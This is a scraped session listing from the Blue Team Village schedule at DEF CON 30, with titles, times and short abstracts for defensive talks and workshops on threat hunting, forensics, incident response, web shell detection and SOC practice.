https://dc30.blueteamvillage.org/call-for-content-2022/talk/PE7C8T/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PE7C8T/feedback/
Talks (Virtual)
Threat Hunt Trilogy: A Beast in the Shadow!
Talk (virtual, prerecorded)
2022-08-13T11:00:00-07:00
11:00
01:00
File-less threats operate in silence and stealth, enabling adversaries to bypass automated cybersecurity, lurk in our digital wonderland, and avoid standard detections. They are hidden beasts in shadow! This technical talk will briefly explain the different types of file-less threats and the importance of threat hunting to combat them. A Windows-based file-less threat will also be hunted via the live system, memory, and network packet analysis, followed by a comparative discussion about each method's capabilities. The threat hunts' hypotheses used in this presentation are practical, and all will be mapped with MITRE knowledge bases.
call-for-content-2022-172-threat-hunt-trilogy-a-beast-in-the-shadow-
en
Although file-less threats may require some sort of files to operate or indirectly use them in some part of their lifecycle (e.g., infection chain), their malicious activities are conducted only in the memory. The adversaries misuse the trusted applications or native utilities such as PowerShell and WMI to download and load malicious codes directly into memory and execute them without touching the hard disk.
The newly discovered file-less threat campaign utilizes an innovative technique for the first time to store and hide its shellcode in the Windows event logs, which will be loaded and used by a dropper in the last stage of the infection lifecycle. To put it simply, the file-less threat could be a nightmare for blue teams and threat hunters.
This technical talk will briefly explain the different categories of file-less threats; however, as the title suggests, the focus of this trilogy will be a file-less threat hunt via three different approaches as follows:
• System Live Analysis: A few techniques such as running processes and lineage analysis, command-line Strings, masquerading and obfuscation, and port to process mapping will be used to look for the file-less threat traces on a live active system.
• Memory Forensics: This is one of the most exciting parts as it dives into the main territory of file-less threats and examines PowerShell execution, process tree, hierarchy, and handles to look for any potential signs of threats.
• Network Packet Investigation: Network conversations, malicious HTTP requests, files transferred, and adversaries' commands will be extracted from network packets (i.e., a sample PCAP file) to hunt the files-less threat used in the previous parts.
Finally, a comparative review discusses the advantages and disadvantages of the above techniques. All the three approaches will be conducted using open-source and free tools, native operating system commands, and built-in utilities. The threat hunt hypothesis and educated guesses will be formulated based on the industrial test cases provided by MITRE ATT&CK, D3fend, and CAR [Cyber Analytics Repository].
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/JA9NDV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/JA9NDV/feedback/
Talks (Virtual)
Even my Dad is a Threat Modeler!
Mini Talk (virtual, prerecorded)
2022-08-13T12:15:00-07:00
12:15
00:30
The talk will mainly focus on different frameworks of Threat Modelling and how threat modelling can be more efficient. Learning from the past experiences and common mistakes which organizations make while doing threat modelling.
call-for-content-2022-173-even-my-dad-is-a-threat-modeler-
en
Detailed Outline will be as follows:
1. What is Threat Modelling?
2. Why is Threat Modeling necessary?
3.Common Threat Modelling Frameworks:
All the mentioned frameworks will be explained in detail with actionable scenarios and how to measure violations and propose mitigations
STRIDE
PASTA
VAST
TRIKE
4. How to plan Threat Modelling?
5. What NOT to do when doing threat modelling?
6. How to handle the results of threat modelling to not make it overwhelming to different stakeholders?
For eg:
In STRIDE, I'll give an overview and then walkthrough real life scenarios how
1. Explanantion of the framwork
2. Example:
2.1. Spoofing Identity refers to violation of authentication
Can be potrayed by misconfigured VPN configurations (in detail)
2.2 Tampering with data refers to Integrity
Having mutable logs and super admin having toxic right to change them (in detail)
2.3 Non Repudiation
Multiple users using same set of credentials causing non-repudiation and making logs useless because actions can't be backtracked to the user performing it (in details)
etc
I will give examples from actual threat modellings I have done but remove all the organisation related information and make them generic, then what scenarios look like in organisations.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VMHQQ3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VMHQQ3/feedback/
Talks (Virtual)
The DFIR Report Homecoming Parade Panel
Talk (virtual, prerecorded)
2022-08-13T13:00:00-07:00
13:00
01:00
Follow along as we take the D3FC0N Hacker Homecoming theme to the next level with a DFIR Report Homecoming Parade. The panel will provide additional context to various DFIR Reports released in the past year. Pick up some tips and tricks to up your game!
call-for-content-2022-188-the-dfir-report-homecoming-parade-panel
en
The DFIR Report Homecoming Parade will not discuss normal (BAU) CTI actions, such as searching the logs for hits on the IOCs or entering the IOCs into a Threat Intelligence Platform (TIP) or other alerting platform. Instead, the participants will focus on pivoting, TTPs, and how they would take the contents in the various DFIR Reports to the NEXT LEVEL! When the Panelists respond to the DFIR Reports, they are operating under the assumption that they performed the preliminary analysis and deemed the threat report relevant to their environment. The purpose of this assumption is to decrease the amount of debate on whether or not something is relevant to get to the part of the analysis that involves extracting actionable takeaways. https://github.com/ch33r10/DEFCON30-BTV-TheDFIRReportHomecomingParadePanel
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SWJTX9/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SWJTX9/feedback/
Talks (Virtual)
Hunting Malicious Office Macros
Mini Talk (virtual, prerecorded)
2022-08-13T14:15:00-07:00
14:15
00:30
When reviewing threat intelligence reports it is common to see malicious Office macros of various types used as an initial access vector. Recently, Microsoft announced big changes to Office behavior in the context of malicious macros. However, organizations still struggle with detecting malicious macros which is often a prerequisite for implementing any type of hardening changes. The aim of this talk is to address this gap and provide guidance on how to detect malicious macro usage in environments and highlight the necessary steps to ensure systems are properly hardened against this threat.
call-for-content-2022-171-hunting-malicious-office-macros
en
The talk will cover the following areas:
- Baselining Office macros behaviors
- Contextualized / Risk-based alerting strategies
- Data sets & Sysmon configurations will be provided
- Coverage of new attack vectors such as mark of the web bypasses and VSTO files
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/833UZN/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/833UZN/feedback/
Talks (Virtual)
Horusec - Brazilian SAST help World
Lightning Talk (virtual, prerecorded)
2022-08-13T15:00:00-07:00
15:00
00:15
Presentation of the Horusec tool (https://github.com/ZupIT/horusec) that was developed by ZUP IT in Brazil to help companies identify security problems in the most common languages still in a development environment or the IDE.
call-for-content-2022-184-horusec-brazilian-sast-help-world
en
Demonstrate how Horusec can help and how easy it is to get started. Show the evolutions of the latest version and invite people to contribute. Show the case of Log4j where we became Top Trend on Twitter because of the detection and after that several big companies started using it.
Demonstrate from installation to configuration to detection and how AppSec and BlueTeam times can benefit.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WQWVCW/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WQWVCW/feedback/
Workshops (Virtual)
Web Shell Hunting
Workshop (4-hr, virtual, live)
2022-08-13T11:00:00-07:00
11:00
04:00
Web Shells are malicious web applications used for remote access. They've been used in many of the recent prominent breaches/vulnerabilities including Equifax, SolarWinds, and ProxyLogon and are used by APTs and other threats. With ProxyLogon, the FBI was authorized to remove them from victim machines.
This session will help you avoid telling your employer that the FBI is now doing volunteer admin work by teaching you about Web Shells, how to hunt for them, and doing hands-on hunting in a VM. A little groundwork goes a long way and this class will show what to do.
call-for-content-2022-185-web-shell-hunting
en
This workshop will provide the basics of what web shells are, how they are typically used, defensive strategies to prevent them, and ways they can be detected in different layers of security. The detection layers that will be covered are antivirus/endpoint protection, file integrity monitoring, file system analysis, log analysis, network traffic analysis, and endpoint anomaly detection.
Participants will be provided with a virtual machine image that they could both exploit with web shells and perform threat hunting on.
The breakdown is roughly this:
60-80 minutes - what web shells are, what they're used for, ways they can be detected
20 minutes - overview of my perspective on what web threat hunting is and how it varies from conventional threat hunting (TLDR - if you're on the internet, you're always going to be attacked so it's not a matter of picking up an unknown threat so much as filtering through evidence to determine if an attack is actually dangerous)
90+ minutes - hands-on exercises covering various ways to detect web shells such as file integrity monitoring, deobfuscation, YARA, dirty words, time stomping, etc. And then exploiting a vulnerable application and uploading a Web Shell and showing how it can be used to plunder data.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LL8KS8/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LL8KS8/feedback/
Main Stage (In-person)
Obsidian Forensics: KillChain3 - Continued Adventures in Splunk and Security Onion
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
A Live Forensics Walkthrough of Obsidian Kill Chain 3 (KC3) forensics analysis using Splunk and Security Onion
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-205-obsidian-forensics-killchain3-continued-adventures-in-splunk-and-security-onion
en
A Live Forensics Walkthrough of Obsidian Kill Chain 3 (KC3) forensics analysis using Splunk and Security Onion
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VDDRCP/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VDDRCP/feedback/
Main Stage (In-person)
Obsidian CTH Live: Killchain 3 - Are there any logs?
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
Obsidian CTH Live: Killchain 3 Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-213-obsidian-cth-live-killchain-3-are-there-any-logs-
en
Obsidian CTH Live: Killchain 3 - Are there any logs?
What happens when an attacker clears the logs in an effort to hide their tracks? Here we will dive into that question, build a Threat Hunting hypothesis, develop some ways to detect this activity, and document the process.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/8SAYLD/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/8SAYLD/feedback/
Main Stage (In-person)
Obsidian Live: May We Have the OODA Loops?
Project Obsidian (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
Incident Response Live Walkthough: This will go over how to use OODA to effectively investigate and respond to a real world incident. Come work through the demos alongside experts during this live walkthrough.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-216-obsidian-live-may-we-have-the-ooda-loops-
en
Incident Response Live Walkthough: This will go over how to use OODA to effectively investigate and respond to a real world incident. Come work through the demos alongside experts during this live walkthrough.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EMATXS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EMATXS/feedback/
Main Stage (In-person)
Challenges in Control Validation
Panel (in-person)
2022-08-13T15:00:00-07:00
15:00
01:00
Testing security controls is hard. Really hard. Every incident responder has lived with victims who are sure existing security controls should have prevented or detected the intrusion. While some organizations don’t do any security control validation, those that do understand the challenges. While red team operations allow for point-in-time validation, how are organizations dealing with control validations during product updates or configuration changes? By and large the answer is “they aren’t.” On this panel, we’ll discuss why control validation is difficult. Then we’ll discuss recommendations for scaling control validation operations in practically any organization.
call-for-content-2022-179-challenges-in-control-validation
en
Sample panel questions may include:
How is control validation different from red teaming?
Isn’t control validation just purple teaming? (it’s not)
How do you recommend my organization starts its first control validation exercise?
What’s you #1 recommendation for maturing a control validation program?
What are methods for scaling control validation programs?
How much validation is too much? When is the cost no longer justified?
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/QFH3KV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/QFH3KV/feedback/
Main Stage (In-person)
Making Your SOC Suck Less
Panel (in-person)
2022-08-13T16:00:00-07:00
16:00
01:00
The Security Operations Center: is it really more than a place to go where dreams die? So many analysts feel that there’s no way to improve and they’re in a dead end job. How can you turn your nightmare into something more bearable? By the end of this panel, you will gain a series of tips and tricks to take back to your SOC, you will learn how to get the most from your individual experience, lift up your team around you, or at least recognize when it’s time to run like mad.
call-for-content-2022-190-making-your-soc-suck-less
en
The Security Operations Center: is it really more than a place to go where dreams die? So many analysts feel that the soul-sucking march of awful false positive alerts will never end; there’s no way to improve and they’re in a dead end job. How can you turn your nightmare into something more bearable? Come join our panelists, four security analysts turned leaders, as they get grilled by our moderator in answering this question and more. By the end of this talk, you will gain a series of tips and tricks to take back to your SOC whether it’s new or old, big or small, chaotic or calm. You will learn how to get the most from your individual experience, lift up your team around you, or at least recognize when it’s time to run like mad.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/UASASZ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/UASASZ/feedback/
Main Stage (In-person)
Latest and Greatest in Incident Response
Panel (in-person)
2022-08-13T17:00:00-07:00
17:00
01:00
IR is constantly in motion, adversaries change tactics and techniques and so do Incident Responders. Come hear from IR professionals what they've been up to for the past year.
call-for-content-2022-191-latest-and-greatest-in-incident-response
en
IR is constantly in motion, adversaries change tactics and techniques and so do Incident Responders. Come hear from IR professionals what they've been up to for the past year.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GRUE9X/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GRUE9X/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - OODA! An hour in incident responder life
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
Let's dance and fly from dogfight to cyberworld. How to investigate and win against threats.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-202-obsidian-ir-ooda-an-hour-in-incident-responder-life
en
Project Obsidian Incident Response station will walk through the OODA loop and Jupyter Notebooks to help you investigate, document and answer the key questions during incidents.
This session is based on Kill Chain 3 data set and will leverage msticpy.
Data, Notebook and Presentation will be made available after Defcon.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3VFVAC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3VFVAC/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Kill Chain 3 Endpoint Forensics Walkthrough
Project Obsidian (in-person)
2022-08-13T11:30:00-07:00
11:30
01:00
Obsidian Forensics Station: Kill Chain 3 Endpoint Forensics Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-207-obsidian-forensics-kill-chain-3-endpoint-forensics-walkthrough
en
Obsidian Forensics Station: In this pre-recorded presentation we will walk through the artifacts and analysis of the Obsidian Kill Chain 3 using forensics artifacts found on affected Endpoints.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YYKCPF/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YYKCPF/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - Final Reporting Made Exciting*
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
*Insert eye catching and compelling abstract on IR final reporting here. Make it seem exciting and not at all a dreaded yet critical part of incident handling.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-203-obsidian-ir-final-reporting-made-exciting-
en
*Insert eye catching and compelling abstract on IR final reporting here. Make it seem exciting and not at all a dreaded yet critical part of incident handling.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XTXX3Q/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XTXX3Q/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Using Chainsaw to Identify Malicious Activity
Project Obsidian Short (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
When time is of essence in IR, having a tool to quickly collect data from Windows Event Logs is the way to go. We'll LET IT RIP with Chainsaw, hosted by B4nd1t0 as part of Project Obsidian.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-211-obsidian-forensics-using-chainsaw-to-identify-malicious-activity
en
This talk is a small in-depth look of using Chainsaw for investigations using the Obsidian project as the example.
The intent is to go over the following:
- Default display to console
- Creating a CSV for slicing and to put into a spreadsheet
- SIGMA rules and how Chinsaw applies those rules
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/H9MR3T/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/H9MR3T/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Creating a custom Velociraptor collector
Project Obsidian Short (in-person)
2022-08-13T14:30:00-07:00
14:30
00:30
Obsidian 4n6 Station: Pre-Recorded - Obsidian 4n6: Creating a custom Velociraptor collector
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-210-obsidian-forensics-creating-a-custom-velociraptor-collector
en
Obsidian 4n6 Station: Pre-Recorded - Obsidian 4n6: Creating a custom Velociraptor collector
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XR9GNT/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XR9GNT/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Sniffing Compromise: Hunting for Bloodhound
Project Obsidian (in-person)
2022-08-13T10:30:00-07:00
10:30
01:00
Join us on a journey as we chase BloodHound through a compromised environment via host and network telemetry. We will dive quickly into detections to become better prepared for next time.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-224-obsidian-cth-sniffing-compromise-hunting-for-bloodhound
en
Join us on a journey as we chase BloodHound through a compromised environment via host and network telemetry. We will dive quickly into detections to become better prepared for next time.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/R8WBNN/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/R8WBNN/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTI: Operationalizing Threat Intelligence
Project Obsidian (in-person)
2022-08-13T11:30:00-07:00
11:30
01:00
This module presents an overview of how threat intelligence gleaned from a single CTI report can be operationalized across an organization. We'll run through a report based on content from Project Obsidian's kill chain 3 and demonstrate how it can be operationalized by different teams (SOC, IR, forensics, security management, and executives.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-198-obsidian-cti-operationalizing-threat-intelligence
en
This module covers:
- Direction & Planning: Establishing CTI goals and objectives
- Collection: Objective is to review and operationalize a single CTI report
- Analysis & Production: Elements to identify in a CTI report
- Dissemination: Sharing takeaways from a CTI report with stakeholders
- Feedback & Evaluation: Methods for receiving feedback
Objective: Demonstrate how a CTI report can be operationalized.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EUCS7V/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/EUCS7V/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian REM: Phishing In The Morning: An Abundance of Samples!
Project Obsidian (in-person)
2022-08-13T13:00:00-07:00
13:00
01:00
Coming soon
call-for-content-2022-218-obsidian-rem-phishing-in-the-morning-an-abundance-of-samples-
en
Coming soon
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZNJRVS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZNJRVS/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: The Logs are Gone?
Project Obsidian (in-person)
2022-08-13T14:00:00-07:00
14:00
01:00
What happens when an attacker clears the logs in an effort to hide their tracks? Here we will dive into that question, build a Threat Hunting hypothesis, develop some ways to detect this activity, and document the process.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-226-obsidian-cth-the-logs-are-gone-
en
What happens when an attacker clears the logs in an effort to hide their tracks? Here we will dive into that question, build a Threat Hunting hypothesis, develop some ways to detect this activity, and document the process.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/7PMXR7/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/7PMXR7/feedback/
Main Stage (In-person)
Backdoors & Breaches, Back to the Stone Age!
Project Obsidian (in-person)
2022-08-14T11:00:00-07:00
11:00
01:00
A crowd interactive, igneous take on the BHIS IR card game.
call-for-content-2022-219-backdoors-breaches-back-to-the-stone-age-
en
Don't flake early! There will be several rounds of well-punned games all localized to Project Obsidian's killchain data and the tools utilized. Learn how the fates will treat you with an incident on the line. Backdoors & Breaches is an Incident Response Card Game from Black Hills Information Security and Active Countermeasures. The game contains 52 unique cards to conduct incident response tabletop exercises and learn attack tactics, tools, and methods.
https://www.blackhillsinfosec.com/projects/backdoorsandbreaches/
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PYP7V3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PYP7V3/feedback/
Main Stage (In-person)
Project Obsidian: Panel Discussion
Project Obsidian (in-person)
2022-08-14T12:00:00-07:00
12:00
01:00
Project Obsidian crew members talk about how they put it all together.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-220-project-obsidian-panel-discussion
en
- How was Project Obsidian put together
- Involved a global village
- Opportunities for mentoring
- Look behind the scenes of a CTF
- and more
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ANEWWL/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ANEWWL/feedback/
Main Stage (In-person)
Blue Team Village Closing Ceremony
Panel (in-person)
2022-08-14T13:00:00-07:00
13:00
01:00
Closing ceremony for Blue Team Village @ DEF CON 30
call-for-content-2022-221-blue-team-village-closing-ceremony
en
Closing ceremony for Blue Team Village @ DEF CON 30
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/33FEUC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/33FEUC/feedback/